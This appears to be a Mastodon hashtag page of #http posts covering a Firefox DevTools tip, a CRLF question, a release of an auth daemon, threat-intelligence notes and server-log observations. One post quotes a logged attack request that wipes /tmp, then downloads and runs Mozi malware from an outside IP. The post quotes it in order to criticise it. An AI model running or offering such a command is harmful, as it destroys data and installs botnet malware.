Create accountLogin

Recent searches

No recent searches

Search options

Only available when logged in.
mastodon.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
The original server operated by the Mastodon gGmbH non-profit

Administered by:

Server stats:

332K
active users

mastodon.social: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.4.0-nightly.2025-04-15

#http

23 posts20 participants3 posts today
Public
Geeker's Digest

The so-called Developer Tools in the @mozilla Firefox browser are extremely helpful to debug application code and #HTTP errors.

Long-time #Firefox users may have noticed a change in the "Edit and Resend" function. In the past, the request headers could be modified - they are now greyed out.

But with a small configuration change, the old behaviour of "Edit and Resend" can be enabled again. This allows to modify the request headers before re-sending the request.

In our latest #tutorial post we show how.
geekersdigest.com/how-to-modif

Geeker's Digest · How to modify Headers in Developer Tools "Edit and Resend"
More from Geeker's Digest
Public *
argv minus one

Just found out that it is no longer possible to straightforwardly write HTTP/1 requests by hand on the #terminal.

Modern #Apache will reject #HTTP 1.x requests where the line endings are not CRLF, and as far as I know it's not possible on #Linux to type a CR using the keyboard. Ctrl+M should do it in theory, but when I try, it produces LF instead of CR for some reason.

Is there by any chance a way to make the Linux #console (or #KDE #Konsole) produce CRLF when I push the Enter key?

Public
Felix Palmen :freebsd: :c64:

Just released: #swad v0.4

swad is the "Simple Web Authentication Daemon", offering a minimal #http server to do #cookie authentication with some #login form, intended for usage behind a reverse #proxy, designed with #nginx' "auth_request" in mind. It's written in pure #C with minimal dependencies (just OpenSSL/LibreSSL for TLS support and libpam for PAM support).

This release was a quick one, but a new credentials checker module deserves a new release. Now we have "exec" to delegate checking credentials to some external tool.

Read more in the full release notes, grab the .tar.xz and build/install it 😎:
github.com/Zirias/swad/release

New features: New credential checker "exec", executing some external tool for checking username/password Bugfixes: Don't attempt to close pipes to the PAM helper when it exits, this can lead to ...
GitHubRelease swad 0.4 · Zirias/swadNew features: New credential checker "exec", executing some external tool for checking username/password Bugfixes: Don't attempt to close pipes to the PAM helper when it exits, this can lead to ...
Public
OTX Bot

Threat Infrastructure Uncovered Before Activation

Between November 2024 and April 2025, a set of domains and servers impersonating an Iraqi academic organization and fictitious UK tech firms were tracked. The infrastructure, while dormant, exhibited characteristics similar to APT34 (OilRig), including shared SSH keys, structured websites, and decoy HTTP behavior on M247-hosted servers. Key observations include the use of port 8080 for fake 404 responses, consistent SSH fingerprint reuse, and domains registered through P.D.R. Solutions with regway.com nameservers. The setup suggests deliberate pre-operational staging, offering defenders an early warning opportunity. Detection strategies include monitoring SSH fingerprints, HTTP response patterns, and domain registration behaviors.

Pulse ID: 68082a17ee5771aa012e93c3
Pulse Link: otx.alienvault.com/pulse/68082
Pulse Author: AlienVault
Created: 2025-04-22 23:45:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#APT34#CyberSecurity#HTTP
Public
JdeBP

From yesterday's httpd log:

/shell?cd+/tmp;rm+-rf+*;wget+http:/45.230.66.30:11302/Mozi.a;chmod+777+Mozi.a;/tmp/Moz...: open failed: file does not exist

There are HTTP servers out there set up stupidly enough to give shell access to anyone who asks‽

It's 2025. Blow any thoughts of Little Bobby Tables! How is shelling out with attacker-supplied data a feature of any HTTP server software? The world has known that rlogin was a bad idea since at least 1991.

#HTTP
Continued thread
Public
CrowdSec

How to protect your systems:

1. Check the CrowdSec #CTI feed: Investigate the activity of the “Bold Peachpuff Euphonia” cohort here.

2. Preemptively block infected IPs: Subscribe to curated #HTTP Exploit and Crowdsec Intelligence Blocklists featuring a high rotation rate of malicious IPs and 0% false positives.

3. Deploy behavior-based protection: Deploy the CrowdSec Security Engine to detect evolving threats and take advantage of the built-in behavior-based #WAF.​ Our decentralized network of Security Engines detected this trend early on. If you're running CrowdSec, you're likely already protected — our Remediation Components actively mitigate these signals in real time.

Sharing insights and taking swift action can collectively reduce the impact of these threats. This is your call to action for real-time threat intelligence and #collaborative #cybersecurity.

For more information, visit crowdsec.net 🧵[4/4]

crowdsec.netCurated Threat Intelligence Powered by the Crowd | CrowdSecWe turn crowd-powered intelligence into tactical intelligence with actionable blocklists to maximize your SOC efficiency and reduce your costs.
Continued thread
Public
JdeBP

Another interesting thing is how the malicious HTTP 1.1 traffic which is not being rejected uses either the (human-readable form of the) server's IP address, or the domain name that the DNS maps that IP address to, as the virtual host name.

Of course, the bad actors are doing this just to hit that one rare case where a configuration slip lets those names get at something of some sort.

But they aren't trying any other obvious virtual host names. It seems somewhat half-hearted; so probably hasn't paid off well enough as an attack strategy to have been seriously worked on.

#HTTP
Public
JdeBP

I was supposed, given that the sun shone through a little bit, to drive over to a relative and put together a set of shelves for xem.

Instead, I spent the day improving some logging code in an HTTP 1.1 server, to see how much HTTP 0.9 and 1.0 traffic it is rejecting.

A surprisingly high fraction, it turns out, given what I've read reported about the drop offs in these two since 2010.

Of course, this is being measured on a server where all of the HTTP traffic, except for me on another machine on the LAN, is from bad actors. One can see in the requests that other than are-you-there checks against index.html and favicon.ico the traffic is all exploit attempts against PHP, CGI, and other things.

So I suppose one way of looking at this is that excluding HTTP 0.9 and 1.0 excludes a non-trivial amount of malicious requests.

#HTTP
ExploreLive feeds
About